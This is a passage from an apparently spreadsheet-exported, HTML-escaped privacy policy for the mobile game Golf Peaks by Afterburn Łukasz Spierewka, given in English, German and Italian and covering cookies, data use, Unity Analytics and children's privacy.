&lt;li&gt;&lt;strong&gt;Preference Cookies.&lt;/strong&gt; We use Preference Cookies to remember your preferences and various settings.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt; Security Cookies.&lt;/strong&gt;</t>
  </si>
  <si>
    <t>We use Security Cookies for security purposes.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Use of Data&lt;/h2&gt;
&lt;p&gt;Afterburn Łukasz Spierewka uses the collected data for various purposes:&lt;/p&gt;
 &lt;ul&gt;
&lt;li&gt;To provide and maintain our Service&lt;/li&gt;
&lt;li&gt;To notify you about changes to our Service&lt;/li&gt;
&lt;li&gt;To allow you to participate in interactive features of our Service when you choose to do so&lt;/li&gt;
&lt;li&gt;To provide customer support&lt;/li&gt;
&lt;li&gt;To gather analysis or valuable information so that we can improve our Service&lt;/li&gt;
&lt;li&gt;To monitor the usage of our Service&lt;/li&gt;
&lt;li&gt;To detect, prevent and address technical issues&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Transfer of Data&lt;/h2&gt;
&lt;p&gt;Your information, including Personal Data, may be transferred to - and maintained on - computers located outside of your state, province, country or other governmental jurisdiction where the data protection laws may differ from those of your jurisdiction.&lt;/p&gt;
&lt;p&gt;If you are located outside and choose to provide information to us, please note that we transfer the data, including Personal Data, to and process it there.&lt;/p&gt;
&lt;p&gt;Your consent to this Privacy Policy followed by your submission of such information represents your agreement to that transfer.&lt;/p&gt;
&lt;p&gt;Afterburn Łukasz Spierewka will take all the steps reasonably necessary to ensure that your data is treated securely and in accordance with this Privacy Policy and no transfer of your Personal Data will take place to an organisation or a country unless there are adequate controls in place including the security of your data and other personal information.&lt;/p&gt;
&lt;h2&gt;Disclosure of Data&lt;/h2&gt;
&lt;h3&gt; Legal Requirements&lt;/h3&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>Afterburn Łukasz Spierewka may disclose your Personal Data in the good faith belief that such action is necessary to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;To comply with a legal obligation&lt;/li&gt;
&lt;li&gt;To protect and defend the rights or property of Afterburn Łukasz Spierewka&lt;/li&gt;
&lt;li&gt;To prevent or investigate possible wrongdoing in connection with the Service&lt;/li&gt;
&lt;li&gt;To protect the personal safety of users of the Service or the public&lt;/li&gt;
&lt;li&gt;To protect against legal liability&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Security of Data&lt;/h2&gt;
&lt;p&gt; The security of your data is important to us but remember that no method of transmission over the Internet or method of electronic storage is 100% secure.</t>
  </si>
  <si>
    <t xml:space="preserve">While we strive to use commercially acceptable means to protect your Personal Data, we cannot guarantee its absolute security.&lt;/p&gt;
&lt;h2&gt; Service Providers&lt;/h2&gt;
&lt;p&gt; We may employ third party companies and individuals to facilitate our Service (&amp;quot;Service Providers&amp;quot;), provide the Service on our behalf, perform Service-related services or assist us in analysing how our Service is used.
</t>
  </si>
  <si>
    <t xml:space="preserve">These third parties have access to your Personal Data only to perform these tasks on our behalf and are obligated not to disclose or use it for any other purpose.&lt;/p&gt;
&lt;h3&gt;Analytics&lt;/h3&gt;
&lt;p&gt;We may use third-party Service Providers to monitor and analyse the use of our Service.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Unity Analytics&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Unity Analytics is provided by Unity Technologies.&lt;/p&gt;
&lt;p&gt;For more information on what type of information Unity Analytics collects, please visit their Privacy Policy page: &lt;a href="https://unity3d.com/legal/privacy-policy" rel="external nofollow noopener" target="_blank"&gt;https://unity3d.com/legal/privacy-policy&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Links to Other Sites&lt;/h2&gt;
&lt;p&gt;Our Service may contain links to other sites that are not operated by us. If you click a third party link, you will be directed to that third party's site. We strongly advise you to review the Privacy Policy of every site you visit.
</t>
  </si>
  <si>
    <t>You are advised to review this Privacy Policy periodically for any changes. Changes to this Privacy Policy are effective when they are posted on this page.&lt;/p&gt;
&lt;h2&gt;Contact Us&lt;/h2&gt;
&lt;p&gt;If you have any questions about this Privacy Policy, please contact us:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;By email: &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="d0b7bfbcb690b1b6a4b5a2b2a5a2befeb7b1bdb5a3"&gt;[email&amp;#160;protected]&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class="tab-content translations-content-item de hidden" id="de"&gt;
&lt;h1&gt;Datenschutz-Richtlinie&lt;/h1&gt;
&lt;p&gt;Datum des Inkrafttretens: October 15, 2018&lt;/p&gt;
&lt;p&gt; Afterburn</t>
  </si>
  <si>
    <t>Łukasz Spierewka (&amp;quot;wir&amp;quot;, &amp;quot;uns&amp;quot;, &amp;quot;unser&amp;quot; usw.) betreibt die mobile App Golf Peaks (nachstehend als &amp;quot;Dienst&amp;quot; bezeichnet).&lt;/p&gt;
&lt;p&gt;Diese Seite enthält Informationen zu der Art und Weise, auf welche wir personenbezogene Daten erfassen, nutzen und offenlegen, wenn Sie unseren Dienst nutzen, sowie zu den Optionen, die Ihnen im</t>
  </si>
  <si>
    <t>Zusammenhang mit diesen Daten zur Verfügung stehen. Diese Datenschutzrichtlinie wird von &lt;a href="https://www.freeprivacypolicy.com/free-privacy-policy-generator/" target="_blank"&gt;Privacy Policy Generator&lt;/a&gt; verwaltet.&lt;/p&gt;
&lt;p&gt;Wir nutzen Ihre Daten zur Bereitstellung und Verbesserung unseres Dienstes. Durch Inanspruchnahme des Dienstes erklären Sie sich mit der Erfassung und Nutzung von Daten durch uns nach Maßgabe dieser Richtlinie einverstanden.</t>
  </si>
  <si>
    <t>Soweit in dieser Datenschutz-Richtlinie nicht jeweils etwas anderes angegeben ist, kommt den in dieser Datenschutz-Richtlinie vorkommenden Begriffen jeweils dieselbe Bedeutung zu, die diesen in unseren Allgemeinen Geschäftsbedingungen (Terms and Conditions) zugewiesen wurde.&lt;/p&gt;
&lt;h2&gt;Begriffsbestimmungen&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Dienst&lt;/strong&gt;
 Der Dienst ist die von dem Afterburn Łukasz Spierewka betriebene mobile App Golf Peaks&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Personenbezogene Daten&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Personenbezogene Daten sind Daten, die sich auf eine lebende Person beziehen, welche anhand dieser Daten (bzw. anhand dieser Daten in Kombination mit weiteren Informationen, die sich bereits in unserem Besitz befinden oder mit Wahrscheinlichkeit in unseren Besitz gelangen werden) identifizierbar ist.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Nutzungsdaten&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Nutzungsdaten sind Daten, die automatisch im Rahmen der Nutzung des Dienstes oder innerhalb der Dienstinfrastruktur selbst (beispielsweise für die Dauer eines Seitenbesuchs) erfasst werden.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Cookies&lt;/strong&gt;
Cookies sind kleine Dateien, die auf Ihrem Gerät (Computer oder mobiles Endgerät) gespeichert werden.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Erfassung und Nutzung von Daten&lt;/h2&gt;
&lt;p&gt;Wir erfassen verschiedene Arten von Daten für eine Reihe von Zwecken, um den Dienst, den wir Ihnen zur Verfügung stellen, zu verbessern.&lt;/p&gt;
&lt;h3&gt;Arten der erfassten Daten&lt;/h3&gt;
&lt;h4&gt;Personenbezogene Daten&lt;/h4&gt;
&lt;p&gt;Im Rahmen der Nutzung unseres Dienstes bitten wir Sie gegebenenfalls um die Zurverfügungstellung bestimmter persönlich identifizierbarer Daten, die wir dazu nutzen, um Sie zu kontaktieren oder zu identifizieren (&amp;quot;personenbezogene Daten&amp;quot;).</t>
  </si>
  <si>
    <t xml:space="preserve">Persönlich identifizierbare Daten umfassen beispielsweise folgende Daten (sind jedoch nicht auf diese beschränkt):&lt;/p&gt;
 &lt;ul&gt;
&lt;li&gt;Cookies und Nutzungsdaten&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;Nutzungsdaten&lt;/h4&gt;
&lt;p&gt;Wenn Sie auf unseren Dienst mithilfe eines mobilen Endgeräts zugreifen, erfassen wir bestimmte Daten gegebenenfalls automatisch, unter anderem den Typ des von Ihnen genutzten mobilen Endgeräts, Ihre individuelle Geräteidentifikation, die IP-Adresse Ihres mobilen Endgeräts, Ihr mobiles Betriebssystem, den Typ des von Ihnen genutzten mobilen Internetbrowsers, individuelle Geräteidentifikationsmerkmale und weitere Diagnostikdaten (&amp;quot;Nutzungsdaten&amp;quot;).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>&lt;h4&gt;Tracking &amp;amp; Cookies&lt;/h4&gt;
&lt;p&gt;Wir setzen Cookies und ähnliche Tracking-Technologien zur Überwachung der Aktivität innerhalb unseres Dienstes ein und speichern in diesem Zusammenhang bestimmte Daten.&lt;/p&gt;
&lt;p&gt;Cookies sind Dateien mit einem geringen Datenumfang, wie zum Beispiel anonyme einzigartige Identifikatoren. Cookies werden von einer Website an Ihren Browser gesendet und auf Ihrem Gerät gespeichert. Die sonstigen von uns eingesetzten Tracking-Technologien sind so genannte Beacons, Tags und Scripts und dienen der Erfassung und Nachverfolgung von Daten sowie der Verbesserung und</t>
  </si>
  <si>
    <t>Analyse unseres Dienstes.&lt;/p&gt;
&lt;p&gt;Sie können in den Einstellungen Ihres Browsers bestimmen, ob Sie alle Cookies ablehnen oder nur bestimmte Cookies akzeptieren möchten. Falls Sie jedoch die Annahme von Cookies verweigern, können Sie gegebenenfalls Teile unseres Dienstes nicht in Anspruch nehmen.&lt;/p&gt;
&lt;p&gt; Beispiele für von uns eingesetzte Cookies:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Sitzungs-Cookies.&lt;/strong&gt; Wir setzen Sitzungs-Cookies für den Betrieb unseres Dienstes ein.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Präferenz-Cookies.&lt;/strong&gt; Wir setzen Präferenz-Cookies ein, um Ihre Präferenzen und verschiedenen Einstellungen zu speichern.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Sicherheits-Cookies.&lt;/strong&gt; Wir setzen Sicherheits-Cookies für Sicherheitszwecke ein.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Datennutzung&lt;/h2&gt;
&lt;p&gt;Wir bei Afterburn Łukasz Spierewka nutzen die erfassten Daten für verschiedene Zwecke, beispielsweise um:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Ihnen unseren Dienst zur Verfügung zu stellen und diesen aufrecht zu erhalten;&lt;/li&gt;
&lt;li&gt;Ihnen Änderungen in Bezug auf unseren Dienst mitzuteilen;&lt;/li&gt;
&lt;li&gt;es Ihnen auf Wunsch zu ermöglichen, an den interaktiven Teilen unseres Dienstes teilzunehmen;&lt;/li&gt;
&lt;li&gt;Kundendienstleistungen zur Verfügung zu stellen;&lt;/li&gt;
&lt;li&gt;Analysedaten und sonstige wertvolle Daten zu erfassen, damit wir unseren Dienst verbessern können;&lt;/li&gt;
&lt;li&gt;die Nutzung unseres Dienstes zu überwachen;&lt;/li&gt;
&lt;li&gt;technische Probleme zu erkennen, zu vermeiden und zu beheben;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Übertragung von Daten&lt;/h2&gt;
&lt;p&gt;Ihre Daten, einschließlich personenbezogener Daten, können auf Computer übertragen – und auf solchen aufbewahrt – werden, die sich außerhalb Ihres Heimatstaates, Ihrer Heimatprovinz, Ihres Heimatlandes oder einer sonstigen Rechtsordnung befinden und somit Datenschutzgesetzen unterliegen, die sich von den Datenschutzgesetzen in Ihrer Rechtsordnung unterscheiden.&lt;/p&gt;
&lt;p&gt;Falls Sie sich außerhalb von befinden und sich dazu entscheiden, Daten an uns zu übermitteln, müssen Sie zur Kenntnis nehmen, dass wir Ihre Daten, einschließlich personenbezogener Daten, nach übertragen und diese dort verarbeiten.&lt;/p&gt;
&lt;p&gt;Ihre Zustimmung zu dieser</t>
  </si>
  <si>
    <t>Datenschutz-Richtlinie und eine nachfolgende Übermittlung von Daten Ihrerseits stellt eine Einverständniserklärung Ihrerseits zu der genannten Übertragung dar.&lt;/p&gt;
&lt;p&gt;Afterburn Łukasz Spierewka wird alle im zumutbaren Rahmen erforderlichen Schritte unternehmen um sicherzustellen, dass Ihre Daten auf sichere Weise sowie in Übereinstimmung mit dieser Datenschutz-Richtlinie behandelt werden, und dass Ihre personenbezogenen Daten nicht an Organisationen oder in Länder übertragen werden, hinsichtlich welcher keine hinreichenden Kontrollmechanismen in Bezug auf die Sicherheit Ihrer Daten und sonstigen personenbezogenen Informationen vorliegen.&lt;/p&gt;
&lt;h2&gt;Offenlegung von Daten&lt;/h2&gt;
&lt;h3&gt;Gesetzliche Anforderungen&lt;/h3&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>Afterburn Łukasz Spierewka kann Ihre personenbezogenen Daten unter Umständen offenlegen, wenn es unter Beachtung der Grundsätze von Treu und Glauben der Ansicht ist, dass dies zur Erreichung der nachfolgenden Zielsetzungen erforderlich ist:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;zur Erfüllung einer gesetzlichen Pflicht&lt;/li&gt;
&lt;li&gt;zum Schutz und zur Verteidigung der Rechte oder des Eigentums von Afterburn Łukasz Spierewka&lt;/li&gt;
&lt;li&gt;zur Vermeidung oder Untersuchung möglicher Fehlverhaltensweisen in Bezug auf den Dienst&lt;/li&gt;
&lt;li&gt;zum Schutz der persönlichen Sicherheit der Nutzer des Dienstes oder der Öffentlichkeit&lt;/li&gt;
&lt;li&gt;zur Vermeidung von Haftungsansprüchen&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Datensicherheit&lt;/h2&gt;
&lt;p&gt;Die Sicherheit Ihrer Daten ist uns wichtig. Bitte vergessen Sie jedoch nicht, dass es keine Übertragungsmethoden über das Internet und keine elektronischen Speichermedien gibt, die 100 % sicher sind. Obwohl wir stets bemüht sind, kommerziell annehmbare Maßnahmen zum Schutz Ihrer personenbezogenen Daten umzusetzen, können wir eine absolute Sicherheit nicht garantieren.&lt;/p&gt;
&lt;h2&gt;Leistungsanbieter&lt;/h2&gt;
&lt;p&gt;Wir beauftragen gegebenenfalls dritte</t>
  </si>
  <si>
    <t>Unternehmen und Einzelpersonen (&amp;quot;Leistungsanbieter&amp;quot;) mit Unterstützungsleistungen zum einfacheren Angebot unseres Dienstes, mit der Erbringung von Leistungen in unserem Namen, mit der Erbringung von mit unserem Dienst verbundenen Leistungen oder mit Unterstützungsleistungen zur Analyse der Art und Weise, auf die unser Dienst in Anspruch genommen wird.&lt;/p&gt;
&lt;p&gt;Diese Dritten können auf Ihre personenbezogenen Daten nur in dem Umfang Zugriff nehmen, der für die Erfüllung der genannten Aufgaben in unserem Namen erforderlich ist, und dürfen diese für keine sonstigen Zwecke offenlegen oder nutzen.&lt;/p&gt;
 &lt;h3&gt;Analytik&lt;/h3&gt;
&lt;p&gt;Wir beauftragen gegebenenfalls dritte Leistungsanbieter mit der Überwachung und Analyse der Nutzung unseres Dienstes.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Unity Analytics&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Unity Analytics ist ein Angebot von Unity Technologies.&lt;/p&gt;
&lt;p&gt;Weitere Informationen zu der Art von Daten, die von Unity Analytics erfasst werden können Sie auf Unity Analytics Webseite mit seiner Datenschutz-Richtlinie (Privacy Policy) einsehen: &lt;a href="https://unity3d.com/legal/privacy-policy" rel="external nofollow noopener" target="_blank"&gt;https://unity3d.com/legal/privacy-policy&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Links zu anderen Websites&lt;/h2&gt;
&lt;p&gt;Unser Dienst kann Links zu anderen Websites enthalten, die nicht von uns betrieben werden.</t>
  </si>
  <si>
    <t>Wenn Sie auf einen Drittlink klicken, werden Sie direkt auf die Website des betreffenden Dritten weitergeleitet. Wir empfehlen Ihnen dringend, sich jeweils die Datenschutz-Richtlinien aller von Ihnen besuchten Websites durchzulesen.&lt;/p&gt;
&lt;p&gt;Wir haben keine Kontrolle über die Inhalte, Datenschutzvorschriften und -praktiken dritter Websites oder Dienste und übernehmen in diesem Zusammenhang keine Haftung.&lt;/p&gt;
&lt;h2&gt; Privatsphäre Minderjähriger&lt;/h2&gt;
&lt;p&gt;Unser Dienst richtet sich nicht an Personen, die das 18.</t>
  </si>
  <si>
    <t>Lebensjahr noch nicht vollendet haben (&amp;quot;minderjährige Personen&amp;quot;).&lt;/p&gt;
&lt;p&gt;Wir erfassen wissentlich keine persönlich identifizierbaren Daten zu minderjährigen Personen. Falls Sie ein Elternteil oder Vormund sind und es Ihnen bekannt wird, dass eine Ihrer Aufsicht unterstehende minderjährige Person uns personenbezogene Daten übermittelt hat, bitten wir Sie, mit uns Kontakt aufzunehmen.</t>
  </si>
  <si>
    <t>Falls uns bekannt wird, dass wir personenbezogene Daten einer minderjährigen Person ohne elterliche Zustimmung erfasst haben, setzen wir Maßnahmen zur Entfernung dieser Daten von unseren Servern um.&lt;/p&gt;
&lt;h2&gt;Änderungen dieser Datenschutz-Richtlinie&lt;/h2&gt;
&lt;p&gt;Wir können unsere Datenschutz-Richtlinie von Zeit zu Zeit aktualisieren. Jegliche solcher Änderungen teilen wir Ihnen mit, indem wir die aktualisierte Fassung auf dieser Seite veröffentlichen.&lt;/p&gt;
&lt;p&gt;Wir werden Sie vor dem Inkrafttreten der betreffenden Änderung per E-Mail und/oder mittels einer sonstigen sichtbaren Mitteilung innerhalb unseres Dienstes informieren und das &amp;quot;Datum des Inkrafttretens&amp;quot; am Beginn dieser Datenschutz-Richtlinie aktualisieren.&lt;/p&gt;
&lt;p&gt;Wir empfehlen Ihnen, diese Datenschutz-Richtlinie regelmäßig auf Änderungen hin durchzusehen.</t>
  </si>
  <si>
    <t>Änderungen dieser Datenschutz-Richtlinie werden im Zeitpunkt ihrer Veröffentlichung auf dieser Seite wirksam.&lt;/p&gt;
&lt;h2&gt;Kontaktaufnahme&lt;/h2&gt;
&lt;p&gt;Falls Sie Fragen zu dieser Datenschutz-Richtlinie haben, können Sie wie folgt Kontakt zu uns aufnehmen:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Per E-Mail: &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="a5c2cac9c3e5c4c3d1c0d7c7d0d7cb8bc2c4c8c0d6"&gt;[email&amp;#160;protected]&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class="tab-content translations-content-item it hidden" id="it"&gt;
&lt;h1&gt; Informativa sulla Privacy&lt;/h1&gt;
&lt;p&gt;Data di entrata in vigore: October 15, 2018&lt;/p&gt;
&lt;p&gt;Afterburn Łukasz Spierewka (&amp;quot;noi&amp;quot; o &amp;quot;nostro&amp;quot;) gestisce il Golf Peaks l'applicazione per dispositivi mobili (in appresso il &amp;quot;Servizio&amp;quot;).&lt;/p&gt;
&lt;p&gt;Questa pagina vi informa delle nostre politiche riguardanti la raccolta, l'uso e la divulgazione dei dati personali quando usate il nostro Servizio e le scelte che avete associato a quei dati. Questa Informativa sulla privacy è gestita da &lt;a href="https://www.freeprivacypolicy.com/free-privacy-policy-generator/" target="_blank"&gt;Privacy Policy Generator&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Utilizziamo i vostri dati per fornire</t>
  </si>
  <si>
    <t>e migliorare il Servizio. Utilizzando il Servizio, accettate la raccolta e l'utilizzo delle informazioni in conformità con questa informativa. Se non diversamente definito nella presente Informativa sulla privacy, i termini utilizzati nella presente Informativa hanno la stessa valenza dei nostri Termini e condizioni.&lt;/p&gt;
&lt;h2&gt;Definizioni&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Servizio&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Il Servizio è l'applicazione per dispositivi mobili Golf Peaks gestita dalla Afterburn Łukasz Spierewka&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Dati personali&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I</t>
  </si>
  <si>
    <t>Dati personali sono i dati di un individuo vivente che può essere identificato da quei dati (o da quelli e altre informazioni in nostro possesso o che potrebbero venire in nostro possesso).&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Dati di utilizzo&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I dati di utilizzo sono i dati raccolti automaticamente generati dall'utilizzo del Servizio o dall'infrastruttura del Servizio stesso (ad esempio, la durata della visita di una pagina).&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Cookies&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I cookie sono piccoli file memorizzati sul vostro dispositivo (computer o dispositivo mobile).&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Raccolta e uso delle informazioni&lt;/h2&gt;
&lt;p&gt;Raccogliamo diversi tipi di informazioni per vari scopi, per fornire e migliorare il nostro servizio.&lt;/p&gt;
&lt;h3&gt;Tipologie di Dati raccolti&lt;/h3&gt;
&lt;h4&gt;Dati personali&lt;/h4&gt;
&lt;p&gt;Durante l'utilizzo del nostro Servizio, potremmo chiedervi di fornirci alcune informazioni di identificazione personale che possono essere utilizzate per contattarvi o identificarvi (&amp;quot;Dati personali&amp;quot;). Le informazioni di identificazione personale possono includere, ma non sono limitate a:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Cookie e dati di utilizzo&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;Dati di utilizzo&lt;/h4&gt;
&lt;p&gt;Quando si accede al Servizio attraverso un dispositivo mobile, potremmo raccogliere automaticamente alcune informazioni, inclusi, ma non solo, il tipo di dispositivo mobile che si utilizza, l'ID univoco del dispositivo mobile, l'indirizzo IP del dispositivo mobile, il sistema operativo mobile, il tipo di browser Internet mobile che utilizzate, identificatori di dispositivo univoci e altri dati diagnostici (&amp;quot;Dati di utilizzo&amp;quot;).&lt;/p&gt;
&lt;h4&gt;Tracciamento; dati dei cookie&lt;/h4&gt;
&lt;p&gt;Utilizziamo cookie e tecnologie di tracciamento simili per tracciare l'attività sul nostro Servizio e conservare determinate informazioni.&lt;/p&gt;
&lt;p&gt;I cookie sono file con una piccola quantità di dati che possono includere un identificatore univoco anonimo. I cookie vengono inviati al vostro browser da un sito web e memorizzati sul vostro dispositivo.</t>
  </si>
  <si>
    <t>Altre tecnologie di tracciamento utilizzate sono anche beacon, tag e script per raccogliere e tenere traccia delle informazioni e per migliorare e analizzare il nostro Servizio.&lt;/p&gt;
 &lt;p&gt;Potete chiedere al vostro browser di rifiutare tutti i cookie o di indicare quando viene inviato un cookie. Tuttavia, se non si accettano i cookie, potrebbe non essere possibile utilizzare alcune parti del nostro Servizio.&lt;/p&gt;
&lt;p&gt;Esempi di cookie che utilizziamo:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;</t>
  </si>
  <si>
    <t>Cookie di sessione.&lt;/strong&gt; Utilizziamo i cookie di sessione per gestire il nostro servizio.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt; Cookie di preferenza.&lt;/strong&gt;</t>
  </si>
  <si>
    <t>Utilizziamo i cookie di preferenza per ricordare le vostre preferenze e varie impostazioni.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cookie di sicurezza.&lt;/strong&gt; Utilizziamo i cookie di sicurezza per motivi di sicurezza.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Uso dei dati&lt;/h2&gt;
&lt;p&gt;Afterburn Łukasz Spierewka utilizza i dati raccolti per vari scopi:&lt;/p&gt;
 &lt;ul&gt;
&lt;li&gt;Per fornire e mantenere il nostro Servizio&lt;/li&gt;
&lt;li&gt;Per comunicare agli utenti variazioni apportate al servizio che offriamo&lt;/li&gt;
&lt;li&gt;Per permettere agli utenti di fruire, a propria discrezione, di funzioni interattive del nostro servizio&lt;/li&gt;
&lt;li&gt;Per fornire un servizio ai clienti&lt;/li&gt;
&lt;li&gt;Per raccogliere analisi o informazioni preziose in modo da poter migliorare il nostro Servizio&lt;/li&gt;
&lt;li&gt;Per monitorare l'utilizzo del nostro Servizio&lt;/li&gt;
&lt;li&gt;Per rilevare, prevenire e affrontare problemi tecnici&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt; Trasferimento dei dati&lt;/h2&gt;
&lt;p&gt;Le vostre informazioni, compresi i Dati personali, possono essere trasferite a - e mantenute su - computer situati al di fuori del vostro stato, provincia, nazione o altra giurisdizione governativa dove le leggi sulla protezione dei dati possono essere diverse da quelle della vostra giurisdizione.&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>Se ci si trova al di fuori di e si sceglie di fornire informazioni a noi, si ricorda che trasferiamo i dati, compresi i dati personali, in e li elaboriamo lì.&lt;/p&gt;
&lt;p&gt; Il vostro consenso alla presente Informativa sulla privacy seguito dall'invio di tali informazioni rappresenta il vostro consenso al trasferimento.&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>Afterburn Łukasz Spierewka adotterà tutte le misure ragionevolmente necessarie per garantire che i vostri dati siano trattati in modo sicuro e in conformità con la presente Informativa sulla privacy e nessun trasferimento dei vostri Dati Personali sarà effettuato a un'organizzazione o a un paese a meno che non vi siano controlli adeguati dei vostri dati e altre informazioni personali.&lt;/p&gt;
&lt;h2&gt;Divulgazione di dati&lt;/h2&gt;
&lt;h3&gt;</t>
  </si>
  <si>
    <t>Prescrizioni di legge&lt;/h3&gt;
&lt;p&gt;Afterburn Łukasz Spierewka può divulgare i vostri Dati personali in buona fede, ritenendo che tale azione sia necessaria per:&lt;/p&gt;
 &lt;ul&gt;
&lt;li&gt;Rispettare un obbligo legale&lt;/li&gt;
&lt;li&gt;Proteggere e difendere i diritti o la proprietà di Afterburn Łukasz Spierewka&lt;/li&gt;
&lt;li&gt;Prevenire o investigare possibili illeciti in relazione al Servizio&lt;/li&gt;
&lt;li&gt;Proteggere la sicurezza personale degli utenti del Servizio o del pubblico&lt;/li&gt;
&lt;li&gt;Proteggere contro la responsabilità legale&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt; Sicurezza dei dati&lt;/h2&gt;
&lt;p&gt;La sicurezza dei vostri dati è importante per noi, ma ricordate che nessun metodo di trasmissione su Internet o metodo di archiviazione elettronica è sicuro al 100%.</t>
  </si>
  <si>
    <t>Pertanto, anche se adotteremo ogni mezzo commercialmente accettabile per proteggere i vostri Dati personali, non possiamo garantirne la sicurezza assoluta.&lt;/p&gt;
&lt;h2&gt; Fornitori di servizi&lt;/h2&gt;
&lt;p&gt;Potremmo impiegare società e individui di terze parti per facilitare il nostro Servizio (&amp;quot;Fornitori di servizi&amp;quot;), per fornire il Servizio per nostro conto, per eseguire servizi relativi ai Servizi o per aiutarci ad analizzare come viene utilizzato il nostro Servizio.&lt;/p&gt;
&lt;p&gt; Le terze parti hanno accesso ai vostri Dati personali solo per eseguire queste attività per nostro conto e sono obbligate a non rivelarle o utilizzarle per altri scopi.&lt;/p&gt;
&lt;h3&gt;Statistiche&lt;/h3&gt;
&lt;p&gt;Potremmo utilizzare</t>
  </si>
  <si>
    <t>i Fornitori di servizi di terze parti per monitorare e analizzare l'utilizzo del nostro servizio.&lt;/p&gt;
 &lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Unity Analytics&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Unity Analytics è fornito da Unity Technologies.&lt;/p&gt;
&lt;p&gt;Per ulteriori informazioni su quale tipo di informazioni raccoglie Unity Analytics, potete visitare la loro pagina web sull'Informativa sulla Privacy: &lt;a href="https://unity3d.com/legal/privacy-policy" rel="external nofollow noopener" target="_blank"&gt;https://unity3d.com/legal/privacy-policy&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Link ad altri siti&lt;/h2&gt;
&lt;p&gt;OIl nostro servizio può contenere collegamenti ad altri siti non gestiti da noi. Cliccando su un link di terze parti, sarete indirizzati al sito di quella terza parte.</t>
  </si>
  <si>
    <t>Ti consigliamo vivamente di rivedere l'Informativa sulla privacy di ogni sito che visiti.&lt;/p&gt;
&lt;p&gt;Non abbiamo alcun controllo e non ci assumiamo alcuna responsabilità per il contenuto, le politiche sulla privacy o le pratiche di qualsiasi sito o servizio di terzi.&lt;/p&gt;
&lt;h2&gt; Privacy dei minori&lt;/h2&gt;
&lt;p&gt; Il nostro servizio non si rivolge a minori di 18 anni (&amp;quot;Bambini&amp;quot;).&lt;/p&gt;
&lt;p&gt;Non raccogliamo consapevolmente informazioni personali relative a utenti di età inferiore a 18 anni.</t>
  </si>
  <si>
    <t>Se siete un genitore o tutore e siete consapevoli che vostro figlio ci ha fornito Dati personali, vi preghiamo di contattarci. Se veniamo a conoscenza del fatto che abbiamo raccolto Dati personali da minori senza la verifica del consenso dei genitori, adotteremo provvedimenti per rimuovere tali informazioni dai nostri server.&lt;/p&gt;
&lt;h2&gt;Modifiche alla presente informativa sulla privacy&lt;/h2&gt;
